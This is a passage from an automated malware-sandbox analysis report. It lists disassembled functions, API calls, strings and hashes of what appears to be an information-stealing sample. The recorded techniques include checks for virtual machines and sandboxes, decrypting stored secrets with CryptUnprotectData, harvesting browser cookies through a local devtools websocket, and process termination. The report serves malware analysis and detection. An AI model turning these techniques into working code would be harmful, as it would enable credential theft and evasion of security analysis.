gdi32.dll, xrefs: 00402BF6, 00402C0E
GetDeviceCaps, xrefs: 00402D38, 00402D5A
VMwareVM, xrefs: 00402E5C
ntdll.dll, xrefs: 00402C97, 00402CAF

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID:
String ID: %hu/%hu/$%hu/%hu/%hu$CreateDC$CreateDCA$CryptStringToBinaryA$DISPLAY$DISPLAY$GetDevic$GetDeviceCaps$GetUserN$GetUserNameA$HAL9TH$JohnDoe$JohnDoe$NtQueryInformationProcess$ReleaseD$ReleaseDC$VMwareVM$VMwareVMware$crypt32.$crypt32.dll$gdi32.dl$gdi32.dll$ntdll.dl$ntdll.dll$sscanf$user32.d$user32.dll
API String ID: 0-2179091496
Opcode ID: 3d03c016c40e7bf2fefc509958d87a2e635967e32702d11625f5e8fc5cb7fd27
Instruction ID: 86e27b9bdcb8569573e06bdff851749a70f31a48c5ecb8a307c45d2392953fab
Opcode Fuzzy Hash: 3d03c016c40e7bf2fefc509958d87a2e635967e32702d11625f5e8fc5cb7fd27
Instruction Fuzzy Hash: 2A712861818BC58ED712CF24AD187563FE3AB5B348F08725EC8541E2B6D7FA0089C7D9

Function 0081AE0D Relevance: 22.6, APIs: 15, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32 ref: 0081AE2D
wsprintfA.USER32 ref: 0081AE6A
FindFirstFileA.KERNEL32(?,?), ref: 0081AE79
strcmp.MSVCRT ref: 0081AEB6
strcmp.MSVCRT ref: 0081AEEC
_mbscpy.MSVCRT(?,?), ref: 0081AF07
_splitpath.MSVCRT ref: 0081AF24
_mbscpy.MSVCRT(?,?), ref: 0081AF2E
strlen.MSVCRT ref: 0081AF37
isupper.MSVCRT ref: 0081AF58
wsprintfA.USER32 ref: 0081AFA6
_mbscpy.MSVCRT(?,?), ref: 0081AFCD
strlen.MSVCRT ref: 0081AFD6
SHFileOperation.SHELL32(?), ref: 0081AFF3
FindClose.KERNEL32(00000000), ref: 0081B011

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: _mbscpy$FileFindstrcmpstrlenwsprintf$CloseFirstFolderOperationPath_splitpathisupper
String ID:
API String ID: 260673504-0
Opcode ID: 9de74252184d4e92245189a4cf74812e0976ee0e09d85f25a583efaa8448754d
Instruction ID: 3d923391037ac24021db9f14b46c229a8cd76392ced4803fc25eda3daf6827a7
Opcode Fuzzy Hash: 9de74252184d4e92245189a4cf74812e0976ee0e09d85f25a583efaa8448754d
Instruction Fuzzy Hash: 1F514AB18083849AD720DB24EC4AB9B3BEDFFA6314F051568F848D2151EFB59689C367

Function 0040D820 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 442fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,0042EEFC), ref: 0040D891

Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA

Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040DC89
DeleteFileA.KERNEL32(00000000,00000000), ref: 0040DD67
FindNextFileA.KERNEL32(?), ref: 0040DDA0
FindClose.KERNEL32(?), ref: 0040DDB1

Strings

\*.*, xrefs: 0040D866
q:d, xrefs: 0040DA0E
q:d, xrefs: 0040DBB1
q:d, xrefs: 0040DC17

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: File$Findlstrcpy$CloseCopyDeleteFirstNextlstrcatlstrlen
String ID: \*.*$q:d$q:d$q:d
API String ID: 124472186-1383382868
Opcode ID: cb5de748d47e18521a663841614ad92215ed0099e6ebd374e2969049b16209e8
Instruction ID: fd5909e8a48491a8fe3474c087fdb49959fee0d6d26b23eadbfe979ac181219e
Opcode Fuzzy Hash: cb5de748d47e18521a663841614ad92215ed0099e6ebd374e2969049b16209e8
Instruction Fuzzy Hash: 20F165B8A002185ACB06FF62C8D59FE7B769F45749F00442EF412572D2DF289F89CB99

Function 0081986A Relevance: 13.8, APIs: 9, Instructions: 316stringfileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,?), ref: 008198BC
StrCmpCA.SHLWAPI(?,0042EEFC), ref: 008199A2
PathMatchSpecA.SHLWAPI(?,?), ref: 00819A22
lstrcat.KERNEL32(?,?), ref: 00819A48
lstrcat.KERNEL32(?,?), ref: 00819A81
lstrcat.KERNEL32(?,00644BCD), ref: 00819A89
lstrcat.KERNEL32(?,?), ref: 00819A97

Part of subcall function 008139A7: lstrcpy.KERNEL32(00000000), ref: 008139CA

Part of subcall function 00817BE4: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00817C8E
Part of subcall function 00817BE4: CreateThread.KERNEL32(00000000,00000000,0041A90D,?,00000000,00000000), ref: 00817CE0
Part of subcall function 00817BE4: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,00801A24,?), ref: 00817CEC

Part of subcall function 0081986A: FindNextFileA.KERNEL32(00000000,?), ref: 00819CB6
Part of subcall function 0081986A: FindClose.KERNEL32(00000000), ref: 00819CC5

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseCreateFirstMatchNextObjectPathSingleSleepSpecThreadWaitlstrcpy
String ID:
API String ID: 3744366743-0
Opcode ID: 00f26f1d4340412f04d36141e4c609a0aa82bd52beccc6cf5ccb4e54d5e617c6
Instruction ID: a09337172363edf4669d29b0eb12b95b232bd47c3f61b5753f426220e1ff19cb
Opcode Fuzzy Hash: 00f26f1d4340412f04d36141e4c609a0aa82bd52beccc6cf5ccb4e54d5e617c6
Instruction Fuzzy Hash: 4DD1D235D006999BCF01DFA4DC82BEDBBBAFF4A304F005149E945A7152DF70AA85CB91

Function 0081550C Relevance: 13.6, APIs: 9, Instructions: 57processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00815524
Process32First.KERNEL32(00000000,?), ref: 0081552E
Process32Next.KERNEL32(00000000,?), ref: 0081553A
StrCmpCA.SHLWAPI(?,?), ref: 00815554
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00815568
TerminateProcess.KERNEL32(00000000,00000000), ref: 00815577
CloseHandle.KERNEL32(00000000), ref: 0081557E
Process32Next.KERNEL32(00000000,?), ref: 0081558B
CloseHandle.KERNEL32(00000000), ref: 00815596

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
Instruction ID: c92d486d5e2f5f138b72a1f036b4f8a457e967e0c7cf8788f435abb6c827a57a
Opcode Fuzzy Hash: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
Instruction Fuzzy Hash: CE118439200705AFD3202B61AC4EFAB7BBEFFC6B55F051028FA05D6151EF749951CA61

Function 008192FC Relevance: 12.3, APIs: 8, Instructions: 272stringfilememoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0081930E
FindNextFileA.KERNEL32(?,?), ref: 008195A7
FindClose.KERNEL32(?), ref: 008195B8
lstrcat.KERNEL32(?,?), ref: 008195D0
lstrcat.KERNEL32(?), ref: 008195DD
lstrlen.KERNEL32(?), ref: 008195E9
lstrlen.KERNEL32(?), ref: 00819603
FindFirstFileA.KERNEL32(?,?), ref: 0081936A

Part of subcall function 008139A7: lstrcpy.KERNEL32(00000000), ref: 008139CA

Part of subcall function 00818F80: memset.MSVCRT ref: 00818F9C
Part of subcall function 00818F80: memset.MSVCRT ref: 00818FAD
Part of subcall function 00818F80: lstrcat.KERNEL32(?), ref: 00818FEB
Part of subcall function 00818F80: lstrcat.KERNEL32(?,?), ref: 00818FF9
Part of subcall function 00818F80: lstrcat.KERNEL32(?), ref: 00819006

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$Filelstrlenmemset$CloseFirstHeapNextProcesslstrcpy
String ID:
API String ID: 365803619-0
Opcode ID: 086b2853c8734edb0c8109cc3b413a3d6e782f6078e460423ab1a0194b1db5fd
Instruction ID: 35391a1f6b42e3255456489c7d67e4ed6bb68ee3d52810e01e45c3a8e749a72b
Opcode Fuzzy Hash: 086b2853c8734edb0c8109cc3b413a3d6e782f6078e460423ab1a0194b1db5fd
Instruction Fuzzy Hash: C2B1C435D002589BCF01EFA8DC82BEE7BBAFF5A304F006159E945A7152DF70AA85CB51

Function 0081C201 Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0081C21F
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0081C245

Part of subcall function 00813975: lstrcpy.KERNEL32(00000000,?), ref: 00813999

ShellExecuteEx.SHELL32(?), ref: 0081C44A
memset.MSVCRT ref: 0081C46D
ExitProcess.KERNEL32 ref: 0081C47D

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: memset$ExecuteExitFileModuleNameProcessShelllstrcpy
String ID:
API String ID: 3423973079-0
Opcode ID: 24f43bb3527911016e82c6304e7adf950fb8ea5c774f849889b6f01b72f090a7
Instruction ID: b99d19aa99e7080450db7d0fb0ae76a6ca30c2c45d44e846e02bac088b8767f8
Opcode Fuzzy Hash: 24f43bb3527911016e82c6304e7adf950fb8ea5c774f849889b6f01b72f090a7
Instruction Fuzzy Hash: D261F720F047805BD7159F2898927BE7BAAEFDB304F04562DF4DAD7282CB645AC58392

Function 00814DD7 Relevance: 7.6, APIs: 5, Instructions: 66memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00807653,?,?,?,?,?), ref: 00814E0D
GetProcessHeap.KERNEL32(?,00807653,?,?,?,?,?), ref: 00814E20
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,00807653,?,?,?,?,?), ref: 00814E41
GetLastError.KERNEL32(?,?,00807653,?,?,?,?,?), ref: 00814E5B
GetProcessHeap.KERNEL32(?,?,00807653,?,?,?,?,?), ref: 00814E69

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapProcessString$ErrorLast
String ID:
API String ID: 1339486156-0
Opcode ID: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
Instruction ID: 645e78ca332a3586a58fb8607c14445bac70a1451403ee942d03e3e512318e37
Opcode Fuzzy Hash: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
Instruction Fuzzy Hash: 6C11BE752002059FD3204F65AC84E17B7ADFF9A3A4F65142CF590D3220CB31DC448B60

Function 00815468 Relevance: 7.5, APIs: 5, Instructions: 39processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0081547E
Process32First.KERNEL32(00000000), ref: 00815488
Process32Next.KERNEL32(00000000), ref: 0081549F
StrCmpCA.SHLWAPI(?,?), ref: 008154AB
CloseHandle.KERNEL32(00000000), ref: 008154BC

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5012a1a39373a8439626fa26436eeae440fc5d79da291cd707dce7a7579f2252
Instruction ID: c0092346191cd194e4f8b79a748587a8d097c8973cb4f7dc9e1e220fb8808199
Opcode Fuzzy Hash: 5012a1a39373a8439626fa26436eeae440fc5d79da291cd707dce7a7579f2252
Instruction Fuzzy Hash: 11F09071201605ABE3305B21ED4EFAB7BACEFC6756F000424F905D6140EA389995C765

Function 008140BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00644A23,?,?,?,?,?,?,00644A98,?,?,00644A23,?,?,?), ref: 008140C9
GetTimeZoneInformation.KERNEL32 ref: 008140DE

Strings

wwww, xrefs: 008140F2

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: HeapInformationProcessTimeZone
String ID: wwww
API String ID: 3869334356-671953474
Opcode ID: ab4f5e0465bb3e6a8121483e4f84586011c19975fa269fce5d75153393847ed2
Instruction ID: 8db95efca828d0bc20efd28b3bad987d56a4d8fc390b07650cec2674bd864999
Opcode Fuzzy Hash: ab4f5e0465bb3e6a8121483e4f84586011c19975fa269fce5d75153393847ed2
Instruction Fuzzy Hash: ABF0AF79B042506BD714977CBC0BB863A6BABDB725F096224E280CB3E4DE705C5487CA

Function 0080B26D Relevance: 4.5, APIs: 3, Instructions: 42memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 0080B2A2
LocalAlloc.KERNEL32(00000040,00000000), ref: 0080B2BE
LocalFree.KERNEL32(?), ref: 0080B2DA

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
Instruction ID: 681be3ac4904c9d33cb44a4fda8f722fdfc2f38b9a3c75a5b105c83148e6ff0f
Opcode Fuzzy Hash: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
Instruction Fuzzy Hash: 510148755083429BD301EF68D885A5AFBE5FF98345F018A1AF88893250E770D994CBA2

Function 008142CC Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 008142D6

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 578b1cc228f121bc5d8ed93bd6eaf3ddf4f23214b538792434dae786e0614e64
Instruction ID: c32860160efafa9d12869544e4679ef40123fcb3d2bd0a81d27ddb77bdf7f9b2
Opcode Fuzzy Hash: 578b1cc228f121bc5d8ed93bd6eaf3ddf4f23214b538792434dae786e0614e64
Instruction Fuzzy Hash: 46E06D288042509AD3118764FD47BC67B62AB5BB01F042248E740572E0DF785D69C39B

Function 004010B0 Relevance: 27.1, APIs: 18, Instructions: 125stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004010CB
memset.MSVCRT ref: 004010D8
lstrcatA.KERNEL32(?,004315C9), ref: 004010FF
lstrcatA.KERNEL32(?,004315CC), ref: 00401124
lstrcatA.KERNEL32(?,004315CF), ref: 00401149
lstrcatA.KERNEL32(?,004315D2), ref: 0040116E
lstrcatA.KERNEL32(?,004315D5), ref: 00401199
lstrcatA.KERNEL32(?,004315C9), ref: 004011A1
lstrcatA.KERNEL32(?,004315D8), ref: 004011C2
lstrcatA.KERNEL32(?,004315DB,?,004315D8), ref: 004011E7
lstrcatA.KERNEL32(?,004315DE,?,004315DB,?,004315D8), ref: 0040120C
lstrcatA.KERNEL32(?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 00401231
lstrcatA.KERNEL32(?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 00401256
lstrcatA.KERNEL32(?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 0040125E
lstrcatA.KERNEL32(?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 0040127F
strcmp.MSVCRT ref: 0040128C
strcmp.MSVCRT ref: 0040129F
ExitProcess.KERNEL32 ref: 004012B8

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcat$memsetstrcmp$ExitProcess
String ID:
API String ID: 3817037828-0
Opcode ID: 728af6f4b6e436d0f42b955efdaf7f2f13925295410a051c2a29943bed5eb9b8
Instruction ID: 6a77ad9a97fae506735b514474991cfdc0921c47067fbaefa5242544d6cd76bf
Opcode Fuzzy Hash: 728af6f4b6e436d0f42b955efdaf7f2f13925295410a051c2a29943bed5eb9b8
Instruction Fuzzy Hash: 0341E420A442807AD7219B61FD8CB9A3EA95F96318F44307EF442251F2CBFD0588C36E

Function 00810E3E Relevance: 24.5, APIs: 16, Instructions: 480registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00810E5A
memset.MSVCRT ref: 00810E73
memset.MSVCRT ref: 00810E84
memset.MSVCRT ref: 00810E95
RegOpenKeyExA.ADVAPI32(80000001,00643CD2,00000000,00000001,?), ref: 00810EFE
RegGetValueA.ADVAPI32(?,00643D28,00643D10,00000010,00000000,?,00000004), ref: 00810F7B
RegCloseKey.ADVAPI32(?), ref: 00810F98
RegCloseKey.ADVAPI32(?), ref: 00810FCC
RegOpenKeyExA.ADVAPI32(80000001,00643D32,00000000,00000009,?), ref: 00811033
RegEnumKeyExA.ADVAPI32 ref: 0081106B

Part of subcall function 00813AC7: lstrlen.KERNEL32(?,?,?,?,?,00801847,?,0042EEFC), ref: 00813AE0
Part of subcall function 00813AC7: lstrcpy.KERNEL32(00000000,00000000), ref: 00813B09
Part of subcall function 00813AC7: lstrcat.KERNEL32(00000000,?), ref: 00813B11

Part of subcall function 00813A27: lstrcpy.KERNEL32(00000000), ref: 00813A5F

RegGetValueA.ADVAPI32(?,?,00643D88,0000FFFF,00000000,?,00000004,?,?,?), ref: 008111E3
RegGetValueA.ADVAPI32(?,?,00643DB0,00000002,00000000,?,?,?,?,00643DA0,?,?,?,?,?), ref: 008112DA

Part of subcall function 00813A6D: lstrcpy.KERNEL32(00000000,00000000), ref: 00813AAD
Part of subcall function 00813A6D: lstrcat.KERNEL32(00000000,0042EEFC), ref: 00813AB7

RegGetValueA.ADVAPI32(?,?,00643DC0,00000002,00000000,?,?,?,?,00643BBD,?,?,?), ref: 00811375
StrCmpCA.SHLWAPI(?,0042EEFC,?,?,00643DD0), ref: 008113D2
RegEnumKeyExA.ADVAPI32 ref: 00811490
RegCloseKey.ADVAPI32(?,?,00643BC0), ref: 0081151C

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Valuememset$Closelstrcpy$EnumOpenlstrcat$lstrlen
String ID:
API String ID: 327098194-0
Opcode ID: cdfd7f7ffb602feaeb5d0b1cb599e72a99351b3c00e1df40b6be7f6cd5ac3a16
Instruction ID: 50785f8a9db868ddf40a95987c45fe060276002570a2a384dc9edff563b190c6
Opcode Fuzzy Hash: cdfd7f7ffb602feaeb5d0b1cb599e72a99351b3c00e1df40b6be7f6cd5ac3a16
Instruction Fuzzy Hash: 7112D474E002A49ADB20EF64DC59BEE7FBAFF86304F002419E445A7292DBB45AC5CB51

Function 0040A7C1 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 238stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00409638: InternetReadFile.WININET(00000000,?,00001000), ref: 0040970E
Part of subcall function 00409638: InternetReadFile.WININET(00000000,?,00001000), ref: 00409734
Part of subcall function 00409638: InternetCloseHandle.WININET(00000000), ref: 00409746
Part of subcall function 00409638: InternetCloseHandle.WININET(19d), ref: 00409750

Part of subcall function 0041278E: strlen.MSVCRT ref: 0041279E
Part of subcall function 0041278E: memcmp.MSVCRT(?,?,00000000), ref: 004127C5

memset.MSVCRT ref: 0040A895
lstrcatA.KERNEL32(00000000,ws://localhost:9223,00000000,localhost,0042EEFC), ref: 0040A8FA
lstrcatA.KERNEL32(00000000,?), ref: 0040A90A
??_U@YAPAXI@Z.MSVCRT(?,0042EEFC,00000000), ref: 0040A954
memcpy.MSVCRT(00000000,?,?,?,?,0042EEFC,00000000), ref: 0040A96B
lstrcatA.KERNEL32(?,?,?,?,?,?,?,0042EEFC,00000000), ref: 0040A9D8
lstrcatA.KERNEL32(?,?,?,?,?,?,?,0042EEFC,00000000), ref: 0040AA08

Strings

Cookies, xrefs: 0040A994, 0040A9A3
ws://localhost:9223, xrefs: 0040A8F4
.txt, xrefs: 0040AA34
/devtools, xrefs: 0040A848, 0040A865
localhost, xrefs: 0040A801, 0040A82D

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

